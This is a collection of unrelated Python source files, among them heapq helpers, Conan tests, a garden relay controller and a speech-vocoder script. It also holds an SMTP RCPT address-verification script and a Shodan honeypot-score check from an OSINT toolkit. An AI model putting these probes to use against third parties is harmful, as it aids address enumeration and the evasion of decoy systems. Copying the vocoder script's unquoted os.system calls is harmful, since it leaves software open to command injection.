# http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest
def nsmallest(n, iterable, key=None):
"""Find the n smallest elements in a dataset.
Equivalent to: sorted(iterable, key=key)[:n]
"""
# Short-cut for n==1 is to use min()
if n == 1:
it = iter(iterable)
sentinel = object()
if key is None:
result = min(it, default=sentinel)
else:
result = min(it, default=sentinel, key=key)
return [] if result is sentinel else [result]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key)[:n]
# When key is none, use simpler decoration
if key is None:
it = iter(iterable)
# put the range(n) first so that zip() doesn't
# consume one too many elements from the iterator
result = [(elem, i) for i, elem in zip(range(n), it)]
if not result:
return result
_heapify_max(result)
top = result[0][0]
order = n
_heapreplace = _heapreplace_max
for elem in it:
if elem < top:
_heapreplace(result, (elem, order))
top = result[0][0]
order += 1
result.sort()
return [r[0] for r in result]
# General case, slowest method
it = iter(iterable)
result = [(key(elem), i, elem) for i, elem in zip(range(n), it)]
if not result:
return result
_heapify_max(result)
top = result[0][0]
order = n
_heapreplace = _heapreplace_max
for elem in it:
k = key(elem)
if k < top:
_heapreplace(result, (k, order, elem))
top = result[0][0]
order += 1
result.sort()
return [r[2] for r in result]
def nlargest(n, iterable, key=None):
"""Find the n largest elements in a dataset.
Equivalent to: sorted(iterable, key=key, reverse=True)[:n]
"""
# Short-cut for n==1 is to use max()
if n == 1:
it = iter(iterable)
sentinel = object()
if key is None:
result = max(it, default=sentinel)
else:
result = max(it, default=sentinel, key=key)
return [] if result is sentinel else [result]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key, reverse=True)[:n]
# When key is none, use simpler decoration
if key is None:
it = iter(iterable)
result = [(elem, i) for i, elem in zip(range(0, -n, -1), it)]
if not result:
return result
heapify(result)
top = result[0][0]
order = -n
_heapreplace = heapreplace
for elem in it:
if top < elem:
_heapreplace(result, (elem, order))
top = result[0][0]
order -= 1
result.sort(reverse=True)
return [r[0] for r in result]
# General case, slowest method
it = iter(iterable)
result = [(key(elem), i, elem) for i, elem in zip(range(0, -n, -1), it)]
if not result:
return result
heapify(result)
top = result[0][0]
order = -n
_heapreplace = heapreplace
for elem in it:
k = key(elem)
if top < k:
_heapreplace(result, (k, order, elem))
top = result[0][0]
order -= 1
result.sort(reverse=True)
return [r[2] for r in result]
# If available, use C implementation
try:
from _heapq import *
except ImportError:
pass
try:
from _heapq import _heapreplace_max
except ImportError:
pass
try:
from _heapq import _heapify_max
except ImportError:
pass
try:
from _heapq import _heappop_max
except ImportError:
pass
if __name__ == "__main__":
import doctest
print(doctest.testmod())
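# A short usage sketch of the public API defined above; the names are exactly
# the ones exported in __all__, and the expected results follow directly from
# the docstrings.
from heapq import heapify, heappush, heappop, nsmallest, nlargest, merge

data = [5, 1, 9, 3, 7]
heapify(data)                 # data[0] is now the smallest element
heappush(data, 0)
assert heappop(data) == 0

assert nsmallest(2, [5, 1, 9, 3, 7]) == [1, 3]
assert nlargest(2, [5, 1, 9, 3, 7]) == [9, 7]
assert list(merge([1, 3, 5], [2, 4, 6])) == [1, 2, 3, 4, 5, 6]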
|
src/VerifyEmailAddress.py
|
MyPersonalUserSF/Python-Email-Verification-Script
| 166 |
66836
|
import re
import smtplib
import dns.resolver
# Address used for SMTP MAIL FROM command
fromAddress = '<EMAIL>'
# Simple Regex for syntax checking
regex = r'^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,})$'
# Email address to verify
inputAddress = input('Please enter the emailAddress to verify:')
addressToVerify = str(inputAddress)
# Syntax check
match = re.match(regex, addressToVerify)
if match is None:
print('Bad Syntax')
raise ValueError('Bad Syntax')
# Get domain for DNS lookup
splitAddress = addressToVerify.split('@')
domain = str(splitAddress[1])
print('Domain:', domain)
# MX record lookup
records = dns.resolver.query(domain, 'MX')
mxRecord = records[0].exchange
mxRecord = str(mxRecord)
# SMTP lib setup (use debug level for full output)
server = smtplib.SMTP()
server.set_debuglevel(0)
# SMTP Conversation
server.connect(mxRecord)
server.helo(server.local_hostname)  # local_hostname is the FQDN of this machine
server.mail(fromAddress)
code, message = server.rcpt(str(addressToVerify))
server.quit()
#print(code)
#print(message)
# Assume SMTP response 250 is success
if code == 250:
print('Success')
else:
print('Bad')
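# The same SMTP conversation wrapped into a reusable helper, as a sketch.
# It assumes dnspython is installed, outbound port 25 is reachable, and that
# the placeholder sender address is replaced with a real one; greylisting
# servers may still answer 4xx instead of 250.
def smtp_rcpt_check(address, mail_from='verify@example.com'):
    domain = address.split('@')[1]
    mx_record = str(dns.resolver.query(domain, 'MX')[0].exchange)
    check_server = smtplib.SMTP()
    check_server.connect(mx_record)
    check_server.helo(check_server.local_hostname)
    check_server.mail(mail_from)
    code, _ = check_server.rcpt(address)
    check_server.quit()
    return code == 250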
|
conans/test/unittests/util/detect_test.py
|
fanStefan/conan
| 6,205 |
66862
|
<filename>conans/test/unittests/util/detect_test.py
import mock
import unittest
from mock import Mock
from parameterized import parameterized
from conans.client import tools
from conans.client.conf.detect import detect_defaults_settings
from conans.paths import DEFAULT_PROFILE_NAME
from conans.test.utils.mocks import TestBufferConanOutput
class DetectTest(unittest.TestCase):
@mock.patch("platform.machine", return_value="")
def test_detect_empty_arch(self, _):
result = detect_defaults_settings(output=Mock(),
profile_path=DEFAULT_PROFILE_NAME)
result = dict(result)
self.assertTrue("arch" not in result)
self.assertTrue("arch_build" not in result)
@mock.patch("conans.client.conf.detect._gcc_compiler", return_value=("gcc", "8"))
def test_detect_custom_profile(self, _):
output = TestBufferConanOutput()
with tools.environment_append({"CC": "gcc"}):
detect_defaults_settings(output, profile_path="~/.conan/profiles/mycustomprofile")
self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 "
"mycustomprofile", output)
@mock.patch("conans.client.conf.detect._gcc_compiler", return_value=("gcc", "8"))
def test_detect_default_profile(self, _):
output = TestBufferConanOutput()
with tools.environment_append({"CC": "gcc"}):
detect_defaults_settings(output, profile_path="~/.conan/profiles/default")
self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 default",
output)
@mock.patch("conans.client.conf.detect._gcc_compiler", return_value=("gcc", "8"))
def test_detect_file_profile(self, _):
output = TestBufferConanOutput()
with tools.environment_append({"CC": "gcc"}):
detect_defaults_settings(output, profile_path="./MyProfile")
self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 MyProfile",
output)
@mock.patch("conans.client.conf.detect._gcc_compiler", return_value=("gcc", "8"))
def test_detect_abs_file_profile(self, _):
output = TestBufferConanOutput()
with tools.environment_append({"CC": "gcc"}):
detect_defaults_settings(output, profile_path="/foo/bar/quz/custom-profile")
self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 "
"custom-profile", output)
@parameterized.expand([
['powerpc', '64', '7.1.0.0', 'ppc64'],
['powerpc', '32', '7.1.0.0', 'ppc32'],
['rs6000', None, '4.2.1.0', 'ppc32']
])
def test_detect_aix(self, processor, bitness, version, expected_arch):
with mock.patch("platform.machine", mock.MagicMock(return_value='XXXXXXXXXXXX')), \
mock.patch("platform.processor", mock.MagicMock(return_value=processor)), \
mock.patch("platform.system", mock.MagicMock(return_value='AIX')), \
mock.patch("conans.client.tools.oss.OSInfo.get_aix_conf", mock.MagicMock(return_value=bitness)), \
mock.patch('subprocess.check_output', mock.MagicMock(return_value=version)):
result = detect_defaults_settings(output=Mock(),
profile_path=DEFAULT_PROFILE_NAME)
result = dict(result)
self.assertEqual("AIX", result['os'])
self.assertEqual("AIX", result['os_build'])
self.assertEqual(expected_arch, result['arch'])
self.assertEqual(expected_arch, result['arch_build'])
@parameterized.expand([
['arm64', 'armv8'],
['i386', 'x86'],
['i686', 'x86'],
['i86pc', 'x86'],
['amd64', 'x86_64'],
['aarch64', 'armv8'],
['sun4v', 'sparc']
])
def test_detect_arch(self, machine, expected_arch):
with mock.patch("platform.machine", mock.MagicMock(return_value=machine)):
result = detect_defaults_settings(output=Mock(),
profile_path=DEFAULT_PROFILE_NAME)
result = dict(result)
self.assertEqual(expected_arch, result['arch'])
self.assertEqual(expected_arch, result['arch_build'])
@mock.patch("conans.client.conf.detect._clang_compiler", return_value=("clang", "9"))
def test_detect_clang_gcc_toolchain(self, _):
output = TestBufferConanOutput()
with tools.environment_append({"CC": "clang-9 --gcc-toolchain=/usr/lib/gcc/x86_64-linux-gnu/9"}):
detect_defaults_settings(output, profile_path="./MyProfile")
self.assertIn("CC and CXX: clang-9 --gcc-toolchain", output)
def test_vs2022(self):
with mock.patch("conans.client.conf.detect._get_default_compiler",
mock.MagicMock(return_value=("Visual Studio", "17"))):
result = detect_defaults_settings(output=Mock(),
profile_path=DEFAULT_PROFILE_NAME)
result = dict(result)
self.assertEqual('msvc', result['compiler'])
self.assertEqual('19.3', result['compiler.version'])
|
GardenPi/utilities/power_controller.py
|
rjsears/GardenPi
| 220 |
66873
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
power_controller.py for usage with neptune/GardenPi V1.0.0
Manages all of our power zones.
"""
VERSION = "V1.0.0 (2020-07-31)"
import sys
sys.path.append('/var/www/gardenpi_control/gardenpi')
from sqlalchemy import update, select, and_, create_engine
import system_info
from tables import power, power_scheduled_jobs, power_currently_running
from system_logging import setup_logging
from system_logging import read_logging_config
import logging
import wiringpi as mcp
mcp.wiringPiSetup() # initialise wiringpi
mcp.mcp23017Setup(96,0x25) #MCP2 GPIOs 96-111
# Instantiate SQLAlchemy Database Engine
engine = create_engine(system_info.sqlalchemy_db_uri, pool_recycle=3600)
#Setup Module level logging here. Main logging config in system_logging.py
setup_logging()
level = read_logging_config('logging', 'log_level')
level = logging._checkLevel(level)
log = logging.getLogger(__name__)
log.setLevel(level)
class PowerZoneSchedule:
def __init__(self, name, job_id, zone_job, job_enabled, job_start_time, job_stop_time,
job_duration, job_running, monday, tuesday, wednesday, thursday, friday,
saturday, sunday, forced_stopped_manually):
self.name = name
self.job_id = job_id
self.zone_job = zone_job
self.job_enabled = job_enabled
self.job_start_time = job_start_time
self.job_stop_time = job_stop_time
self.job_duration = job_duration
self.job_running = job_running
self.monday = monday
self.tuesday = tuesday
self.wednesday = wednesday
self.thursday = thursday
self.friday = friday
self.saturday = saturday
self.sunday = sunday
self.forced_stopped_manually = forced_stopped_manually
@classmethod
def config_powerzoneschedule(cls, zone_name):
with engine.begin() as conn:
stmt = select([power_scheduled_jobs]).where(power_scheduled_jobs.c.zone.in_(zone_name))
return [
cls(
name=row[power_scheduled_jobs.c.zone],
job_id=row[power_scheduled_jobs.c.job_id],
zone_job=row[power_scheduled_jobs.c.zone_job],
job_enabled=row[power_scheduled_jobs.c.job_enabled],
job_start_time=row[power_scheduled_jobs.c.job_start_time],
job_stop_time=row[power_scheduled_jobs.c.job_stop_time],
job_duration=row[power_scheduled_jobs.c.job_duration],
job_running=row[power_scheduled_jobs.c.job_running],
monday=row[power_scheduled_jobs.c.monday],
tuesday=row[power_scheduled_jobs.c.tuesday],
wednesday=row[power_scheduled_jobs.c.wednesday],
thursday=row[power_scheduled_jobs.c.thursday],
friday=row[power_scheduled_jobs.c.friday],
saturday=row[power_scheduled_jobs.c.saturday],
sunday=row[power_scheduled_jobs.c.sunday],
forced_stopped_manually=row[power_scheduled_jobs.c.forced_stop_manually]
)
for row in conn.execute(stmt).fetchall()
]
def sa_read_powerzone_schedule_by_zonejob(self, zone_name, zone_job):
'''
Uses SQLAlchemy to connect to db and return all jobs by job number.
'''
with engine.begin() as conn:
return (conn.execute(select([power_scheduled_jobs]).where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))))).fetchall()
def sa_read_powerzone_schedule_by_zonejobday(self, zone_name, zone_job, day):
'''
Uses SQLAlchemy to connect to db and return all jobs by job number and day.
'''
with engine.begin() as conn:
results = (conn.execute(select([power_scheduled_jobs]).where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job),
power_scheduled_jobs.c.job_enabled == (True),
getattr(power_scheduled_jobs.c, day) == (True))))).fetchall()
return (results)
def sa_read_zone_schedule_by_zone(self, zone_name):
with engine.begin() as conn:
results = (conn.execute(select([power_scheduled_jobs]).where(power_scheduled_jobs.c.zone == zone_name))).fetchall()
return (results)
def update_day(self, zone_name, zone_job, day_of_week, value):
with engine.begin() as conn:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({getattr(power_scheduled_jobs.c, day_of_week): value}))
def update_job_start_time(self, zone_name, zone_job, job_start_time):
with engine.begin() as conn:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({power_scheduled_jobs.c.job_start_time: job_start_time}))
def update_job_stop_time(self, zone_name, zone_job, job_stop_time):
with engine.begin() as conn:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({power_scheduled_jobs.c.job_stop_time: job_stop_time}))
def toggle_job(self, zone_name, zone_job):
with engine.begin() as conn:
job_enabled = (self.sa_read_powerzone_schedule_by_zonejob(zone_name, zone_job)[0][3])
if job_enabled:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({power_scheduled_jobs.c.job_enabled: False}))
else:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({power_scheduled_jobs.c.job_enabled: True}))
def update_job_duration(self, zone_name, zone_job, job_duration):
with engine.begin() as conn:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({power_scheduled_jobs.c.job_duration: job_duration}))
class PowerController:
def __init__(self, name, number, description, gpio, enabled, running, running_manually, mcp, notifications, sms, pb, email):
self.zone_name = name
self.zone_number = number
self.description = description
self.gpio = gpio
self.enabled = enabled
self.running = running
self.running_manually = running_manually
self.mcp = mcp
self.notifications = notifications
self.sms = sms
self.pb = pb
self.email = email
@classmethod
def read_config(cls, zone_name):
with engine.begin() as conn:
stmt = select([power]).where(power.c.zone_name.in_(zone_name))
return [
cls(
name=row[power.c.zone_name],
number=row[power.c.zone_number],
description=row[power.c.description],
gpio=row[power.c.gpio],
enabled=row[power.c.enabled],
running=row[power.c.running],
running_manually=row[power.c.running_manually],
mcp=row[power.c.mcp],
notifications=row[power.c.notifications],
sms=row[power.c.sms],
pb=row[power.c.pb],
email=row[power.c.email]
)
for row in conn.execute(stmt).fetchall()
]
def run_job(self, job_id):
with engine.begin() as conn:
enabled = (conn.execute(select([power.c.enabled]).where(power.c.zone_name == self.zone_name))).scalar()
if enabled:
with engine.begin() as conn:
running = (conn.execute(select([power.c.running]).where(power.c.zone_name == self.zone_name))).scalar()
if running:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is already running.')
else:
self.running = True
with engine.begin() as conn:
# With this db update we are updating the individual zone db record for the zone that is running.
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running: True}))
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running_manually: False}))
conn.execute(power_scheduled_jobs.update().where(power_scheduled_jobs.c.job_id == job_id).values({power_scheduled_jobs.c.job_running: True}))
# With this db update we are updating the system_wide indication that "a" or "any" zone is running.
# To access this, call use_database.zones_running_now() and it will return True or False on a systemwide
# basis.
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.currently_running: True}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_manually: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_by_job: True}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.job_id: job_id}))
mcp.pinMode(self.gpio, 1)
mcp.digitalWrite(self.gpio, 1)
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is now RUNNING.')
else:
log.debug(f'ERROR: Zone {self.zone_number} ({self.zone_name}) is DISABLED. Please enable it first.')
def run(self):
with engine.begin() as conn:
enabled = (conn.execute(select([power.c.enabled]).where(power.c.zone_name == self.zone_name))).scalar()
if enabled:
with engine.begin() as conn:
running = (conn.execute(select([power.c.running]).where(power.c.zone_name == self.zone_name))).scalar()
if running:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is already running.')
else:
self.running = True
with engine.begin() as conn:
# With this db update we are updating the individual zone db record for the zone that is running.
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running: True}))
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running_manually: True}))
# With this db update we are updating the system_wide indication that "a" or "any" zone is running.
# To access this, call use_database.zones_running_now() and it will return True or False on a systemwide
# basis.
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.currently_running: True}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_manually: True}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_by_job: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.job_id: 0}))
mcp.pinMode(self.gpio, 1)
mcp.digitalWrite(self.gpio, 1)
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is now RUNNING.')
else:
log.debug(f'ERROR: Zone {self.zone_number} ({self.zone_name}) is DISABLED. Please enable it first.')
def stop_job(self, job_id, forced):
with engine.begin() as conn:
running = (conn.execute(select([power.c.running]).where(power.c.zone_name == self.zone_name))).scalar()
if running:
self.running = False
with engine.begin() as conn:
# With this db update we are updating the individual zone db record for the zone that is running.
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running: False}))
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running_manually: False}))
conn.execute(power_scheduled_jobs.update().where(power_scheduled_jobs.c.job_id == job_id).values({power_scheduled_jobs.c.job_running: False}))
if forced:
conn.execute(power_scheduled_jobs.update().where(power_scheduled_jobs.c.job_id == job_id).values({power_scheduled_jobs.c.forced_stop_manually: True}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.force_stopped: True}))
# With this db update we are updating the system_wide indication that "a" or "any" zone is running.
# To access this, call use_database.zones_running_now() and it will return True or False on a systemwide
# basis.
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.currently_running: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_manually: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_by_job: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.job_id: 0}))
mcp.digitalWrite(self.gpio, 0)
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is now STOPPED.')
else:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is not currently running!!.')
def stop(self):
with engine.begin() as conn:
enabled = (conn.execute(select([power.c.enabled]).where(power.c.zone_name == self.zone_name))).scalar()
if enabled:
with engine.begin() as conn:
running = (conn.execute(select([power.c.running]).where(power.c.zone_name == self.zone_name))).scalar()
if running:
self.running = False
with engine.begin() as conn:
# With this db update we are updating the individual zone db record for the zone that is running.
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running: False}))
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running_manually: False}))
# With this db update we are updating the system_wide indication that "a" or "any" zone is running.
# To access this, call use_database.zones_running_now() and it will return True or False on a systemwide
# basis.
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.currently_running: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_manually: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_by_job: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.job_id: 0}))
mcp.digitalWrite(self.gpio, 0)
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is now STOPPED.')
else:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is not currently running.')
else:
log.debug(f'ERROR: Zone {self.zone_number} ({self.zone_name}) is DISABLED. Please enable it first.')
def enable(self):
with engine.begin() as conn:
enabled = (conn.execute(select([power.c.enabled]).where(power.c.zone_name == self.zone_name))).scalar()
if enabled:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is already enabled.')
else:
self.enabled = True
with engine.begin() as conn:
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.enabled: True}))
log.debug(f'Zone {self.zone_number} ({self.zone_name}) has been enabled.')
def disable(self):
with engine.begin() as conn:
enabled = (conn.execute(select([power.c.enabled]).where(power.c.zone_name == self.zone_name))).scalar()
if enabled:
with engine.begin() as conn:
running = (conn.execute(select([power.c.running]).where(power.c.zone_name == self.zone_name))).scalar()
if running:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is currently running.')
log.debug(f'Shutting off Zone {self.zone_number} ({self.zone_name}) before disabling.')
self.stop()
self.enabled = False
with engine.begin() as conn:
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.enabled: False}))
log.debug(f'Zone {self.zone_number} ({self.zone_name}) has been disabled.')
else:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is already disabled.')
def notification_toggle(self, notification):
with engine.begin() as conn:
if getattr(self, notification):
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({notification: False}))
setattr(self, notification, False)
log.debug(f'System Notifications: ({notification}) for Zone {self.zone_number} ({self.zone_name}) Disabled.')
else:
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({notification: True}))
setattr(self, notification, True)
log.debug(f'System Notifications: ({notification}) for Zone {self.zone_number} ({self.zone_name}) Enabled.')
def main():
print("Not intended to be run directly.")
print("This is the systemwide PowerController module.")
print("It is called by other modules.")
exit()
if __name__ == '__main__':
main()
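# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# Callers typically hydrate a controller from the database by zone name and then
# toggle the relay; the zone name 'power1' below is only a hypothetical example:
#
#   zone = PowerController.read_config(('power1',))[0]
#   zone.run()    # energize the MCP23017 GPIO and mark the zone running in the db
#   zone.stop()   # de-energize the GPIO and clear the running flags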
|
skhep/utils/__init__.py
|
scikit-hep/scikit-hep
| 150 |
66875
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license, see LICENSE.
"""
Module for miscellaneous and general utilities.
"""
from .exceptions import *
|
misc/scripts/vocoder/straight/extract_features_for_merlin.py
|
G-Thor/merlin
| 1,305 |
66911
|
<filename>misc/scripts/vocoder/straight/extract_features_for_merlin.py
import os
import sys
import shutil
import glob
import time
import multiprocessing as mp
if len(sys.argv)!=5:
print("Usage: ")
print("python extract_features_for_merlin.py <path_to_merlin_dir> <path_to_wav_dir> <path_to_feat_dir> <sampling rate>")
sys.exit(1)
# top merlin directory
merlin_dir = sys.argv[1]
# input audio directory
wav_dir = sys.argv[2]
# Output features directory
out_dir = sys.argv[3]
# initializations
fs = int(sys.argv[4])
# tools directory
straight = os.path.join(merlin_dir, "tools/bin/straight")
sptk = os.path.join(merlin_dir, "tools/bin/SPTK-3.9")
raw_dir = os.path.join(out_dir, 'raw' )
sp_dir = os.path.join(out_dir, 'sp' )
mgc_dir = os.path.join(out_dir, 'mgc')
bap_dir = os.path.join(out_dir, 'bap')
ap_dir = os.path.join(out_dir, 'ap')
f0_dir = os.path.join(out_dir, 'f0' )
lf0_dir = os.path.join(out_dir, 'lf0')
if not os.path.exists(out_dir):
os.mkdir(out_dir)
if not os.path.exists(raw_dir):
os.mkdir(raw_dir)
if not os.path.exists(sp_dir):
os.mkdir(sp_dir)
if not os.path.exists(mgc_dir):
os.mkdir(mgc_dir)
if not os.path.exists(bap_dir):
os.mkdir(bap_dir)
if not os.path.exists(ap_dir):
os.mkdir(ap_dir)
if not os.path.exists(f0_dir):
os.mkdir(f0_dir)
if not os.path.exists(lf0_dir):
os.mkdir(lf0_dir)
if fs == 16000:
nFFT = 1024
alpha = 0.58
elif fs == 48000:
nFFT = 4096
alpha = 0.77
else:
print("As of now, we don't support %d Hz sampling rate." %(fs))
print("Please consider either downsampling to 16000 Hz or upsampling to 48000 Hz")
sys.exit(1)
mcsize = 59
order = 24
nFFTHalf = 1 + nFFT // 2  # integer division keeps this an int when interpolated into the tool command lines
fshift = 5
def get_wav_filelist(wav_dir):
wav_files = []
for file in os.listdir(wav_dir):
whole_filepath = os.path.join(wav_dir,file)
if os.path.isfile(whole_filepath) and str(whole_filepath).endswith(".wav"):
wav_files.append(whole_filepath)
elif os.path.isdir(whole_filepath):
wav_files += get_wav_filelist(whole_filepath)
wav_files.sort()
return wav_files
def process(filename):
'''
The function decomposes a wav file into F0, mel-cepstral coefficients, and band aperiodicity
:param filename: path to wav file
:return: .lf0, .mgc and .bap files
'''
file_id = os.path.basename(filename).split(".")[0]
print(file_id)
sox_wav_2_raw_cmd = 'sox %s -b 16 -c 1 -r %s -t raw %s' % (filename,\
fs,\
os.path.join(raw_dir, file_id + '.raw'))
os.system(sox_wav_2_raw_cmd)
### STRAIGHT ANALYSIS -- extract vocoder parameters ###
### extract f0, sp, ap ###
straight_f0_analysis_cmd = "%s -nmsg -maxf0 400 -uf0 400 -minf0 50 -lf0 50 -f0shift %s -f %s -raw %s %s" % (os.path.join(straight, 'tempo'), \
fshift, fs, \
os.path.join(raw_dir, file_id + '.raw'), \
os.path.join(f0_dir, file_id + '.f0'))
os.system(straight_f0_analysis_cmd)
straight_ap_analysis_cmd = "%s -nmsg -f %s -fftl %s -apord %s -shift %s -f0shift %s -float -f0file %s -raw %s %s" % (os.path.join(straight, 'straight_bndap'),\
fs, nFFT, nFFTHalf, fshift, fshift,\
os.path.join(f0_dir, file_id + '.f0'), \
os.path.join(raw_dir, file_id + '.raw'), \
os.path.join(ap_dir, file_id + '.ap'))
os.system(straight_ap_analysis_cmd)
straight_sp_analysis_cmd = "%s -nmsg -f %s -fftl %s -apord %s -shift %s -f0shift %s -order %s -f0file %s -pow -float -raw %s %s" % (os.path.join(straight, 'straight_mcep'),\
fs, nFFT, nFFTHalf, fshift, fshift, mcsize, \
os.path.join(f0_dir,file_id + '.f0'), \
os.path.join(raw_dir,file_id + '.raw'), \
os.path.join(sp_dir,file_id + '.sp'))
os.system(straight_sp_analysis_cmd)
### convert f0 to lf0 ###
sptk_x2x_af_cmd = "%s +af %s | %s > %s " % (os.path.join(sptk, 'x2x'), \
os.path.join(f0_dir, file_id + '.f0'), \
os.path.join(sptk, 'sopr') + ' -magic 0.0 -LN -MAGIC -1.0E+10', \
os.path.join(lf0_dir, file_id + '.lf0'))
os.system(sptk_x2x_af_cmd)
### convert sp to mgc ###
sptk_mcep = "%s -a %s -m %s -l %s -e 1.0E-8 -j 0 -f 0.0 -q 3 %s > %s" % (os.path.join(sptk, 'mcep'),\
alpha, mcsize, nFFT,\
os.path.join(sp_dir, file_id+'.sp'),\
os.path.join(mgc_dir, file_id+'.mgc'))
os.system(sptk_mcep)
### convert ap to bap ###
sptk_mcep = "%s -a %s -m %s -l %s -e 1.0E-8 -j 0 -f 0.0 -q 1 %s > %s" % (os.path.join(sptk, 'mcep'),\
alpha, order, nFFT,\
os.path.join(ap_dir, file_id+'.ap'),\
os.path.join(bap_dir, file_id+'.bap'))
os.system(sptk_mcep)
print("--- Feature extraction started ---")
start_time = time.time()
# get wav files list
wav_files = get_wav_filelist(wav_dir)
# do multi-processing
pool = mp.Pool(mp.cpu_count())
pool.map(process, wav_files)
# clean up temporary files
shutil.rmtree(raw_dir, ignore_errors=True)
shutil.rmtree(sp_dir, ignore_errors=True)
shutil.rmtree(f0_dir, ignore_errors=True)
shutil.rmtree(ap_dir, ignore_errors=True)
print("You should have your features ready in: "+out_dir)
(m, s) = divmod(int(time.time() - start_time), 60)
print(("--- Feature extraction completion time: %d min. %d sec ---" % (m, s)))
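# --- Illustrative note (added for clarity; not part of the original script) ---
# To debug the vocoder pipeline on a single utterance without the multiprocessing
# pool, process() can be called directly on one file, e.g.:
#
#   process(os.path.join(wav_dir, 'arctic_a0001.wav'))
#
# 'arctic_a0001.wav' is only a hypothetical filename; any wav under wav_dir at the
# supported 16000 Hz or 48000 Hz sampling rates will do.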
|
plugins/honeypot.py
|
Appnet1337/OSINT-SAN
| 313 |
66920
|
# Developed by Bafomet
# -*- coding: utf-8 -*-
import requests
from settings import shodan_api
# color
R = "\033[31m" # Red
G = "\033[1;34m" # Blue
C = "\033[1;32m" # Green
W = "\033[0m" # white
O = "\033[45m" # Purple
def honeypot(inp):
url = f"https://api.shodan.io/labs/honeyscore/{inp}"
try:
result = requests.get(url, params={"key": shodan_api}).text
except:
print("\nNo information available!")
return
if "error" in result or "404" in result:
print("IP not found")
return
elif result:
probability = str(float(result) * 10)
print(f"{G} [ + ]{R} Probability that this is a honeypot: {probability}%")
print()
print(f"{G} Checked on Shodan as well, nothing there either.")
else:
print(" Something went wrong ")
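# --- Illustrative usage sketch (added for clarity; not part of the original plugin) ---
# The plugin is normally imported and called with an IP or hostname string; the IP
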